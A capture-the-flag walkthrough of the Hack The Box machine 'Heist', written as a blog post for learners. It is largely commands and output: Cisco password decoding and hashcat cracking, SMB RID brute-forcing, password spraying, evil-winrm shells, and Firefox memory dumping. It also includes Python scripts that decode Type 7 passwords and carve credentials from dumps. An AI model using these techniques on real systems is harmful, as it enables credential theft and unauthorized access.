Hack the Box - Heist Walk-through

This blog is related to computer security and ethical hacking and does not promote hacking, cracking, software piracy or any kind of illegal activity. The blog is for informational and educational purposes and for those willing to learn about ethical hacking and penetration testing.

You shall not misuse the information to gain unauthorized access. Performing hack attempts (without permission) on computers that you do not own is illegal.

Hello everyone!

Today we are going to go over the steps I followed to get root on Heist, a machine on Hack the Box. Hack The Box is an online platform allowing you to test and advance your skills in cyber security.

Scanning and Enumeration

I kicked off with an nmap SYN scan of the default ports, with version detection and the default NSE scripts (-sS, -sV and -sC, combined as -sSVC):

TGT=10.129.96.157
nmap -sSVC -n -oA nmap $TGT

Key findings:

  • Port 80: HTTP running Microsoft IIS 10.0.

  • Port 135: MSRPC.

  • Port 445: Microsoft SMB service.

Visiting the web server on port 80 revealed a "Support Login Page" with an option to log in as a guest:

Logging in as guest gave access to a downloadable Cisco configuration file whose username and enable lines carried Type 7 passwords and a Type 5 secret.

Extract of the config File:

security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408

Decrypting Passwords

The configuration file carried three pieces of credential material:

  • rout3r: a Cisco Type 7 password.

  • admin (privilege 15): a Cisco Type 7 password.

  • enable secret: a Cisco Type 5 hash ($1$, md5crypt).

Type 7 is not encryption in any meaningful sense: it is a reversible XOR against a fixed, publicly known key, so it decodes instantly with any Type 7 decoder (I used an online one; on a real engagement decode it locally rather than pasting a client's config into a third-party site). The Type 5 hash is a real salted MD5 and needs cracking, so I ran hashcat in mode 500 against the rockyou wordlist:

hashcat -a 0 -m 500 '$1$pdQG$o8nrSzsGXeaduXrjlvKc91' rockyou.txt -O

Recovered credentials:

  • rout3r: $uperP@ssword

  • admin: Q4)sJu\Y8qz*A3?d

  • enable secret: stealth1agent
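As an added worked example (my code, not part of the original post or of any Cisco tool), here is the Type 7 decode done locally in Python, plus a small parser that pulls the username and enable lines out of an IOS config, decodes the Type 7 values on the spot and reports which hashcat mode the non-reversible ones need. It runs against the excerpt quoted above; the key is Cisco's fixed Type 7 key, and the only assumption is that the config follows the standard IOS `username ... password|secret <type> <value>` syntax.

```python
"""Cisco Type 7 decode and IOS config credential triage.

Added example for this walkthrough, not code from the original post. Type 7 is a
reversible XOR against a fixed, publicly known 53-byte key, so it can be undone
offline in a few lines; only the Type 5 enable secret ($1$..., md5crypt) needs a
real cracking run. The config excerpt below is the one quoted in the post.
"""
import re
from typing import Dict, Optional

# Fixed key IOS uses for `service password-encryption` (Type 7). Not a secret.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

# Constructed input: the credential lines quoted from the downloaded config.
CONFIG_EXCERPT = """\
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
"""


def type7_decode(encoded: str) -> str:
    """Decode a Type 7 string: two decimal digits of key offset, then hex bytes,
    each XORed with the key byte at (offset + position) mod 53."""
    encoded = encoded.strip()
    if len(encoded) < 4 or len(encoded) % 2 or not encoded[:2].isdigit():
        raise ValueError(f"not a Type 7 string: {encoded!r}")
    offset = int(encoded[:2])
    if offset >= len(TYPE7_KEY):
        raise ValueError(f"Type 7 offset out of range: {offset}")
    body = bytes.fromhex(encoded[2:])
    plain = bytes(b ^ TYPE7_KEY[(offset + i) % len(TYPE7_KEY)]
                  for i, b in enumerate(body))
    return plain.decode("ascii")


def type7_encode(plain: str, offset: int = 2) -> str:
    """Inverse of type7_decode (IOS itself picks offsets 0-15). Useful to confirm
    a decode round-trips or to forge a test line for a lab config."""
    if not 0 <= offset < len(TYPE7_KEY):
        raise ValueError(f"offset must be 0..{len(TYPE7_KEY) - 1}")
    body = bytes(ord(c) ^ TYPE7_KEY[(offset + i) % len(TYPE7_KEY)]
                 for i, c in enumerate(plain))
    return f"{offset:02d}{body.hex().upper()}"


def hashcat_mode(hash_value: str) -> Optional[int]:
    """Map an IOS hash prefix to the hashcat mode that cracks it:
    $1$ = Type 5 md5crypt (-m 500), $8$ = Type 8 PBKDF2-SHA256 (-m 9200),
    $9$ = Type 9 scrypt (-m 9300). None for anything else."""
    for prefix, mode in (("$1$", 500), ("$8$", 9200), ("$9$", 9300)):
        if hash_value.startswith(prefix):
            return mode
    return None


_USER_LINE = re.compile(
    r"^username\s+(\S+)(?:\s+privilege\s+\d+)?\s+(?:password|secret)\s+(\d)\s+(\S+)",
    re.MULTILINE)
_ENABLE_LINE = re.compile(r"^enable\s+secret\s+(\d)\s+(\S+)", re.MULTILINE)


def extract_credentials(config: str) -> Dict[str, object]:
    """Pull username and enable-secret lines out of an IOS config. Type 0 is
    plaintext and Type 7 is decoded on the spot; anything else is returned as a
    hash together with the hashcat mode needed to crack it."""
    users = {}
    for name, ptype, value in _USER_LINE.findall(config):
        if ptype == "7":
            users[name] = {"type": 7, "password": type7_decode(value)}
        elif ptype == "0":
            users[name] = {"type": 0, "password": value}
        else:
            users[name] = {"type": int(ptype), "hash": value,
                           "hashcat_mode": hashcat_mode(value)}
    enable = None
    m = _ENABLE_LINE.search(config)
    if m:
        enable = {"type": int(m.group(1)), "hash": m.group(2),
                  "hashcat_mode": hashcat_mode(m.group(2))}
    return {"users": users, "enable_secret": enable}


if __name__ == "__main__":
    found = extract_credentials(CONFIG_EXCERPT)
    for name, info in found["users"].items():
        print(name, info)
    print("enable", found["enable_secret"])
```

Run it as a script and it prints the two decoded Type 7 passwords straight from the excerpt, while the enable secret comes back as the `$1$` hash with mode 500 attached, which is exactly the hashcat command used above.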

SMB Enumeration

I tested the cracked enable secret over SMB with netexec, using hazard as the username:

netexec smb $TGT -u hazard -p stealth1agent 
SMB         10.129.96.157   445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.129.96.157   445    SUPPORTDESK      [+] SupportDesk\hazard:stealth1agent

Then I did a little more enumeration with netexec and smbmap:

netexec smb $TGT -u hazard -p stealth1agent --shares 
SMB         10.129.96.157   445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.129.96.157   445    SUPPORTDESK      [+] SupportDesk\hazard:stealth1agent 
SMB         10.129.96.157   445    SUPPORTDESK      [*] Enumerated shares
SMB         10.129.96.157   445    SUPPORTDESK      Share           Permissions     Remark
SMB         10.129.96.157   445    SUPPORTDESK      -----           -----------     ------
SMB         10.129.96.157   445    SUPPORTDESK      ADMIN$                          Remote Admin
SMB         10.129.96.157   445    SUPPORTDESK      C$                              Default share
SMB         10.129.96.157   445    SUPPORTDESK      IPC$            READ            Remote IPC
smbmap -u hazard -p stealth1agent -d SupportDesk -H $TGT


[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                

[+] IP: 10.129.96.157:445    Name: 10.129.96.157           Status: Authenticated
    Disk                                                      Permissions    Comment
    ----                                                      -----------    -------
    ADMIN$                                                NO ACCESS    Remote Admin
    C$                                                    NO ACCESS    Default share
    IPC$                                                  READ ONLY    Remote IPC

Only IPC$ was readable, so there was nothing to pull from the shares directly, but IPC$ is still enough for RID cycling over the named pipes. A brute-force RID enumeration revealed the local accounts, including:

  • Administrator

  • Guest

  • Hazard

  • Chase

netexec smb $TGT -u hazard -p stealth1agent --rid-brute      
SMB         10.129.96.157   445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.129.96.157   445    SUPPORTDESK      [+] SupportDesk\hazard:stealth1agent 
SMB         10.129.96.157   445    SUPPORTDESK      500: SUPPORTDESK\Administrator (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      501: SUPPORTDESK\Guest (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      503: SUPPORTDESK\DefaultAccount (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      513: SUPPORTDESK\None (SidTypeGroup)
SMB         10.129.96.157   445    SUPPORTDESK      1008: SUPPORTDESK\Hazard (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      1009: SUPPORTDESK\support (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      1012: SUPPORTDESK\Chase (SidTypeUser)
SMB         10.129.96.157   445    SUPPORTDESK      1013: SUPPORTDESK\Jason (SidTypeUser)

I put the usernames from the RID brute into users.txt and the three recovered passwords into passwords.txt and ran a password spray with netexec (check the lockout policy first on anything that is not a lab box):

netexec smb $TGT -u users.txt -p passwords.txt --continue-on-success

And Success! I found valid credentials for user Chase:

  • Username: Chase

  • Password: Q4)sJu\Y8qz*A3?d

With valid credentials, I confirmed remote access using netexec winrm:

netexec winrm $TGT -u Chase -p "Q4)sJu\Y8qz*A3?d" -X "ipconfig"

This granted me WinRM access, allowing me to execute commands on the target.

Exploitation

Using evil-winrm, I gained an interactive shell and extracted the user flag from the desktop:

evil-winrm -i $TGT -u 'Chase' -p 'Q4)sJu\Y8qz*A3?d'

Navigating through the user Desktop, I found and captured the flag. 🎉

Privilege Escalation

After capturing the user.txt flag and exploring the Desktop, I noticed that there was a todo.txt file:

PS C:\Users\Chase\Desktop>type todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.

Done:
1. Restricted access for guest user.

After a quick run with winPEAS, I noticed that there was a Firefox credentials DB file accessible.

Downloading it took me a while: I kept getting a 0-byte file. It turned out that I had to kill the Firefox process before attempting the download, and I was finally able to pull it.

I started trying to crack it, but I had a hard time finding some missing files that were required to recover the credentials.

It eventually turned out to be a 4-hour rabbit hole, as this wasn't the way to escalate privileges.

Well, back to square one. According to Chase's to-do list, he was supposed to keep checking the issues list. Looking at the running processes, the only thing that stood out was Firefox, and there was a good chance he was the one using it.

Disclaimer: At this point I had to look for a hint. Forensics isn’t my strongest suit, so I didn’t think about exploring the processes’ memory.

Once I realized this was a potential avenue and learned about ProcDump.exe (Sysinternals), I uploaded it and used it to dump Firefox's memory:

*Evil-WinRM* PS C:\Users\Chase\Documents> get-process -name firefox

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
   1063      63   112688     201964       2.52   6440   1 firefox

*Evil-WinRM* PS C:\Users\Chase\Documents> $command = "C:\Users\Chase\Documents\procdump.exe -accepteula"
*Evil-WinRM* PS C:\Users\Chase\Documents> Invoke-Expression $command

*Evil-WinRM* PS C:\Users\Chase\Documents> $command = "C:\Users\Chase\Documents\procdump.exe -ma 6440 firefox.dmp"
*Evil-WinRM* PS C:\Users\Chase\Documents> Invoke-Expression $command

I downloaded firefox.dmp to my attacker machine (after several tries, since the transfers kept timing out) for further investigation. The dump was almost 50 MB, and at this point I didn't know what I was looking for.

Going back to the /login.php page, I captured a login attempt in Burp Proxy and inspected the request and response:

The password was sent in a POST parameter named login_password.

Windows stores process command lines and most other text as UTF-16LE, which plain strings (ASCII) would skip, so I ran strings with -e l (16-bit little-endian) and grepped for the parameter name:

strings -el firefox.dmp | grep login_password


"C:\Program Files\Mozilla Firefox\firefox.exe" localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
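As an added example (my code, not from the post), here is the same carve-and-grep step done in Python on a constructed stand-in for firefox.dmp, so it runs offline: it shows why an ASCII pass misses the hit while the UTF-16LE pass finds it, then parses the query string instead of eyeballing it. The sample blob, the minimum string length and the parameter-name lists are my assumptions, not taken from the page.

```python
"""Carve UTF-16LE strings from a process memory dump and pull credentials out
of any URL query strings they contain.

Added example for this walkthrough, not code from the original post. Windows
stores process command lines and most UI text as UTF-16LE, which is why plain
`strings` (ASCII) misses the hit and `strings -e l` finds it. This does the same
carving in Python and then parses the query string properly. The dump below is a
constructed byte blob standing in for firefox.dmp, not the real file.
"""
import re
from typing import Dict, List
from urllib.parse import parse_qs

MIN_LEN = 6  # minimum run length to report, like `strings -n 6`

# A UTF-16LE run of printable ASCII is "printable byte, 0x00" repeated.
_UTF16LE_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % MIN_LEN)
_ASCII_RUN = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)

# Assumed parameter names to look for; extend for the app at hand.
USER_KEYS = ("login_username", "username", "user", "email")
PASS_KEYS = ("login_password", "password", "passwd", "pass")


def carve_strings(blob: bytes, encoding: str = "utf-16le") -> List[str]:
    """Equivalent of `strings -e l` (utf-16le, the default here) or plain
    `strings` (ascii) over an in-memory blob."""
    pattern = _UTF16LE_RUN if encoding == "utf-16le" else _ASCII_RUN
    return [m.group().decode(encoding) for m in pattern.finditer(blob)]


def find_credentials(strings: List[str]) -> List[Dict[str, str]]:
    """Return unique username/password pairs from any URL-with-query-string
    found in the carved strings. parse_qs percent-decodes, so a password that
    was URL-encoded in memory comes back as the real value (a literal '+' in a
    password would turn into a space; the one on this box has none)."""
    results, seen = [], set()
    for s in strings:
        for url in re.findall(r"\S+\?\S+", s):
            params = parse_qs(url.split("?", 1)[1], keep_blank_values=True)
            user = next((params[k][0] for k in USER_KEYS if k in params), None)
            password = next((params[k][0] for k in PASS_KEYS if k in params), None)
            if password and (user, password) not in seen:
                seen.add((user, password))
                results.append({"username": user, "password": password})
    return results


def build_sample_dump() -> bytes:
    """Constructed stand-in for firefox.dmp: non-printable filler around the
    Firefox command line (UTF-16LE, as Windows stores it) plus an ASCII-only
    HTTP request line so the two encodings can be compared."""
    cmdline = ('"C:\\Program Files\\Mozilla Firefox\\firefox.exe" '
               "localhost/login.php?login_username=admin@support.htb"
               "&login_password=4dD!5}x/re8]FBuZ&login=")
    filler = bytes([0x00, 0xFF, 0x17, 0x8A, 0x01, 0xC3]) * 64
    return (filler + cmdline.encode("utf-16le") + b"\x00\x00" + filler
            + b"GET /login.php HTTP/1.1\r\n" + filler)


if __name__ == "__main__":
    dump = build_sample_dump()
    print("ascii hits:   ", carve_strings(dump, "ascii"))
    print("utf-16le hits:", carve_strings(dump))
    print("credentials:  ", find_credentials(carve_strings(dump)))
```

Against a real dump, read the file into `blob` and call `carve_strings` once per encoding; the ASCII pass is still worth running for anything the browser held as UTF-8 (request bodies, JSON), but command lines and window titles only show up in the UTF-16LE pass.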

The hit is Firefox's own command line, launched with the login URL and its credentials in the query string: admin@support.htb and 4dD!5}x/re8]FBuZ.

Password reuse between a web application admin and the local Administrator is common enough to test first, so I tried the password for WinRM as Administrator:

netexec winrm $TGT -u Administrator -p '4dD!5}x/re8]FBuZ'
WINRM       10.129.96.157   5985   SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 (name:SUPPORTDESK) (domain:SupportDesk)
WINRM       10.129.96.157   5985   SUPPORTDESK      [+] SupportDesk\Administrator:4dD!5}x/re8]FBuZ (Pwn3d!)

And it worked!

Then I got a shell and the root flag with Evil-WinRM:

evil-winrm -i $TGT -u Administrator -p '4dD!5}x/re8]FBuZ'

*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt

Lessons Learned

  • Read and analyze all clues carefully (e.g., todo.txt).

  • Cisco Type 7 is reversible, not a hash; treat it as plaintext in any config you find.

  • Use get-process to identify running processes worth dumping.

  • Memory dumps often reveal sensitive data (e.g., credentials); carve UTF-16LE strings as well as ASCII.

  • Credential reuse carried the whole chain: the enable secret worked for hazard over SMB, the admin Type 7 password for Chase, and the web application admin password for the local Administrator.

  • Avoid rabbit holes (DAH!); reassess your strategy if you get stuck.

  • Evil-WinRM and Netexec are your friends.

Call to Action!

Thanks for making it this far! If you're enjoying these and haven't joined Hack The Box yet, I invite you to sign up using my referral link. Trust me, you'll get hooked! 😊 Until next time!